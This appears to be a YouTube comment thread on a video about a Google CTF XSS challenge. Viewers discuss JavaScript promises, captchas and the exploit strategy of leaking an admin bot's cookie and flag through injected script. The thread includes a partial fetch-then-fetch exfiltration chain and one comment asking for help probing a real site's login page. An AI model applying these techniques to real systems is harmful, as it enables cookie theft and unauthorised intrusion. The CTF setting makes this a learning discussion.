today I found a vulnerability at my job's codebase. Essentially arbitrary file deletion.. patched that real quick. I like to think your videos gave me the thinking patterns needed to be able to spot this vulnerability. Thank you!
@@ScorpioneOrzion essentially arbitrary file deletion due to a non-sanitized call to php's unlink function. But luckily most files were not writable by the user that would execute the php-script
Your usage of Promises is ... interesting ... The purpose of Promises is exactly to avoid the nesting you are doing and that you would usually get when using callbacks. You can just do this: fetch("/flag").then(r => r.text()).then(t => fetch(...))
I recently started to learn some Web Application pen-testing, and a lot of the things here finally made sense for me, thank you for your detailed explanation.
u see from doing ctfs and watching videos i was able to follow i was like wow i really learned a lot i can follow this until about 6 minutes the i was like -_- what
Hi, can you do a video writeup for the mathsh challenge from GoogleCTF? I am searching for a writeup of that challenge since the end of the CTF. I worked on that challenge for many hours but couldn't clear it, and I would just want to know if I was on the right track.
Of course, it is the actual response if no error ocurred in the (hopefully present) ".catch(err => { /** **/ })" function. developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch
If anyone have tried using CSRF it does not work because admin can not change his address. Only normal users can do. So, you have to use some technique like preload an like this man did. Or just check the document.referrer
1:00 Wait a second how is there a traffic light in the last box he clicks? I would have failed that captcha... edit: nvm, it was him who failed the captchas lol
Are you sure that setTimeout actually does anything? I've run into issues before when trying to use setTimeout to control a data flow - it's still all executed instantly and doesn't work the same way as async/await/promise.
If you have some doubts or think you need some more insight on setTimeout i suggest you to search on youtube "what the heck is event loop anyway" it's a video of around 26 minutes which gives a good insight on the event loop and how sometimes setTimeout is used in the wrong way. Hope this helps
The short version: The tech support app has a bug in it that allows you to post content that will be parsed as Javascript. This is a major security vulnerability known as xss. The point of the challenge is to get the Google bot to leak out his cookie by having it trigger your inserted malicious Javascript code. But you can't simply grab the cookie and send it back to you because the CORS check will block it. So the solution is you have to do all kinds of acrobatics with your Javascript code and a second XSS to walk the Google bot around the site and log in and out on different sessions.
Overflow is gaining such a deep understanding of computers that he's becoming one. How long before he can't beat recapcha
"Or whatever, so no clue. But in the end, still solved it. Who cares."
Every coder ever.
today I found a vulnerability at my job's codebase. Essentially arbitrary file deletion.. patched that real quick.
I like to think your videos gave me the thinking patterns needed to be able to spot this vulnerability. Thank you!
Give some more details please :)
@@Lolo5 hmmm, no sorry :)
@@TheGrimravager what was the type of vulnerability, if you want to tell that.
@@ScorpioneOrzion essentially arbitrary file deletion due to a non-sanitized call to php's unlink function. But luckily most files were not writable by the user that would execute the php-script
Nice
1:15 -> I think you did a bunch of those capchas wrong.
When it says it wants the traffic lights, you selected the poles as well.
that feeling when the captcha thinks motorcycles and bicycles are the same thing.
That's because the poles have traffic lights on them
It's google using the CTF players as free workers. If you want the flag work 5 min for us :D
Konrad W correct
he a robot
Your usage of Promises is ... interesting ...
The purpose of Promises is exactly to avoid the nesting you are doing and that you would usually get when using callbacks.
You can just do this:
fetch("/flag").then(r => r.text()).then(t => fetch(...))
I think modern chrome supports `await` in console too
@@akuviljanen4695 only in an async function as the exploit is not run in console
Fortunately it's easy to wrap everything into an async lambda
Very good info.
Lol i did that too before learning how promises work
The endless reCaptcha looks about normal for when I use Tor.
Underrated comment..
ya lol, that's why I don't use it
I recently started to learn some Web Application pen-testing, and a lot of the things here finally made sense for me, thank you for your detailed explanation.
Bro i was eagerly waiting for this since 1 week...
As a newbie, i wanted the walkthrough.
Thank you so much bro
I think people with extensive knowledge about client-side would understand this haha
Imagine being on the other end of this... You open up a ticket from a user and suddenly two little embedded windows open and your password is leaked
great stuff, didn't know self-xss was vulnerable in this way!
Me neither! This is very good to know
Testing for XSS in all fields of my page RN 😅
1:30 that's a lot of dedication
those nested Promise#then calls cause me pain 😶
🤯🤯🤯... looking this for the 5. time
u see from doing ctfs and watching videos i was able to follow i was like wow i really learned a lot i can follow this until about 6 minutes the i was like -_- what
Where can I learn this stuff????
Try using promises .... thats what I thought when I saw timeouts...
If you want to get through captchas faster, only check 3 boxes. No more, no less.
Awesome video, thanks!
Hi, can you do a video writeup for the mathsh challenge from GoogleCTF? I am searching for a writeup of that challenge since the end of the CTF. I worked on that challenge for many hours but couldn't clear it, and I would just want to know if I was on the right track.
In your XSS when you have typed "fetch('/flag').then( r => { ....." What is "r"? Is it the "response" of the fetch request?
idk much javascript but probably that is r a custom function so is t
Of course, it is the actual response if no error ocurred in the (hopefully present) ".catch(err => { /** **/ })" function.
developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch
@@malloc8634 nice
could u get us deeper into sdr? would be great!
that captcha tho...😅
Wow amazing video I love it but I better understand in hindi language
PWN challenges please!!!
Have you played the CSAW? I saw team ALLES, it's yours right? How did it went?
Hello brother, Can I ask you some questions?
You told, you using linux in docker. How to set up linux in docker to get the external IP?
google is your friend
13:39, 2 second too long :'(
He should have sped up the intro just to make it fit.
Do you think that with the passage of time, the systems will be more secure and hacking will be almost impossible (or unnecessary)?
No
Come on... Next
Gibe me Next video LiverFlow!!!
If anyone have tried using CSRF it does not work because admin can not change his address. Only normal users can do. So, you have to use some technique like preload an like this man did. Or just check the document.referrer
Is there CTF for begineers? Or something like that?
Take a look at PicoCTF
Do you like John Hammond?
hi i'm pretty new to hacking and i wanted to try to find a vuln in iitianspace.com/login.php pls help
I passed the captcha in 2 trials lol😂
1:00 Wait a second how is there a traffic light in the last box he clicks? I would have failed that captcha...
edit: nvm, it was him who failed the captchas lol
Are you sure that setTimeout actually does anything? I've run into issues before when trying to use setTimeout to control a data flow - it's still all executed instantly and doesn't work the same way as async/await/promise.
setTimeout, at least in my experience, works, but he should've used async/await or promises on this case
If you have some doubts or think you need some more insight on setTimeout i suggest you to search on youtube "what the heck is event loop anyway" it's a video of around 26 minutes which gives a good insight on the event loop and how sometimes setTimeout is used in the wrong way. Hope this helps
Why don't you use Firefox?
Why don’t you use Chrome?
@@LiveOverflow it eats ram (and is slower than Firefox on my PC)
@@zsin128 lol you're out here fighting about browsers, while im out here curling the page and imagining what it looks like im my head
P.S. I donot recommend that, not fun
Chrome has more and better tools for hacking and programming.
Managarmr is so awkward to pronounce 😂😂😂😂
Manager Mr
Should be smoother if it’s your teammate tho?
Less Smoked Leet Chicken
When I read the flag name, I sometimes think I could of guest that
That's great except for the no brute forcing flags condition on ctf's :)
2:23 learn how to use promises man
There is also an solution where you find the username/password in the document.referer.
github.com/weibell/ctf-google2020/tree/master/tech-support
🧐👍🤝🤜👌
jesus christ, where does one even begins to solve that
Team pasten wants to know your location
Funny, I solved this guy using the referrer. I guess it was not intended solution
Do you have a write up (or short explanation) of your solution? I'm very interested in it
I wish I had that knowledge 😑
*captcha lol*
WOW im early. 4 min ago
wtf is that captcha lmfao
wish I could understand this .
"who cares" in a nutshell in this video...XD
wha?
i don't understand anything
The short version:
The tech support app has a bug in it that allows you to post content that will be parsed as Javascript. This is a major security vulnerability known as xss.
The point of the challenge is to get the Google bot to leak out his cookie by having it trigger your inserted malicious Javascript code.
But you can't simply grab the cookie and send it back to you because the CORS check will block it. So the solution is you have to do all kinds of acrobatics with your Javascript code and a second XSS to walk the Google bot around the site and log in and out on different sessions.
Understandable. I had to watch it 3 times to understand it